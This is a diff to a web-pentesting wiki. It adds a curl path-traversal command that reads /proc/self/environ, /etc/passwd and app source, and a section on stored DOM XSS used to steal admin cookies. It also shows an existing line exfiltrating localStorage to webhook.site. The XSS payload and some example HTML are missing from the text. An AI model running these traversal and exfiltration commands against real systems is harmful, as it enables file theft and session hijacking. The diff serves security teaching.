diff --git a/src/pentesting-web/file-inclusion/README.md b/src/pentesting-web/file-inclusion/README.md
index c6045bb956a..719bd0a628f 100644
--- a/src/pentesting-web/file-inclusion/README.md
+++ b/src/pentesting-web/file-inclusion/README.md
@@ -793,6 +793,18 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
+### Preserve traversal sequences from the client
+
+Some HTTP clients normalize or collapse `../` before the request reaches the server, breaking directory traversal payloads. Use `curl --path-as-is` to keep traversal untouched when abusing log/download endpoints that concatenate a user-controlled filename, and add `--ignore-content-length` for pseudo-files like `/proc`:
+
+```bash
+curl --path-as-is -b "session=$SESSION" \
+ "http://TARGET/admin/get_system_log?log_identifier=../../../../proc/self/environ" \
+ --ignore-content-length -s | tr '\000' '\n'
+```
+
+Tune the number of `../` segments until you escape the intended directory, then dump `/etc/passwd`, `/proc/self/cwd/app.py`, or other source/config files.
+
## References
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)
@@ -803,9 +815,9 @@ _Even if you cause a PHP Fatal Error, PHP temporary files uploaded are deleted._
- [Orange Tsai – Confusion Attacks on Apache](https://blog.orange.tw/posts/2024-08-confusion-attacks-en/)
- [VTENEXT 25.02 – a three-way path to RCE](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
- [The Art of PHP: CTF‑born exploits and techniques](https://blog.orange.tw/posts/2025-08-the-art-of-php-ch/)
-
- [When Audits Fail: Four Critical Pre-Auth Vulnerabilities in TRUfusion Enterprise](https://www.rcesecurity.com/2025/09/when-audits-fail-four-critical-pre-auth-vulnerabilities-in-trufusion-enterprise/)
- [Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?](https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/)
+- [HTB: Imagery (admin log download traversal + `/proc/self/environ` read)](https://0xdf.gitlab.io/2026/01/24/htb-imagery.html)
{{#file}}
EN-Local-File-Inclusion-1.pdf
diff --git a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
index 1d19e2889c5..3aced30d005 100644
--- a/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
+++ b/src/pentesting-web/xss-cross-site-scripting/dom-xss.md
@@ -354,9 +354,29 @@ fetch('https://webhook.site/?flag=' + encodeURIComponent(localStorage.getIte
If the bot does not restrict schemes, supplying a `javascript:` URL (`javascript:fetch(...)`) executes in the current origin without new navigation, directly leaking storage values.
+## Template literal `innerHTML` + partial sanitization gaps
+
+Frontends that sanitize only selected fields but still interpolate an untrusted one directly into `innerHTML` are trivially exploitable. Example:
+
+```javascript
+fetch(`${window.location.origin}/admin/bug_reports`).then(r => r.json()).then(reports => {
+ reports.forEach(report => {
+ reportCard.innerHTML = `
+
${DOMPurify.sanitize(report.id)}
+
${report.details}
+ `;
+ });
+});
+```
+
+If the un-sanitized field is stored server-side (e.g., bug report “details”), the payload becomes **stored DOM XSS** for any privileged viewer of the list. A simple payload such as `` executes when an admin opens the page and exfiltrates their cookies.
+
+When the app explicitly disables `SESSION_COOKIE_HTTPONLY` (e.g., Flask `app.config['SESSION_COOKIE_HTTPONLY'] = False`), the stolen cookie immediately grants the admin session even if the signing secret rotates on each boot (random `secret_key` prevents forging, but theft still works).
+
## References
- [Flagvent 2025 (Medium) — pink, Santa’s Wishlist, Christmas Metadata, Captured Noise](https://0xdf.gitlab.io/flagvent2025/medium)
+- [HTB: Imagery (stored DOM XSS via partial DOMPurify + session theft)](https://0xdf.gitlab.io/2026/01/24/htb-imagery.html)
{{#include ../../banners/hacktricks-training.md}}
.png)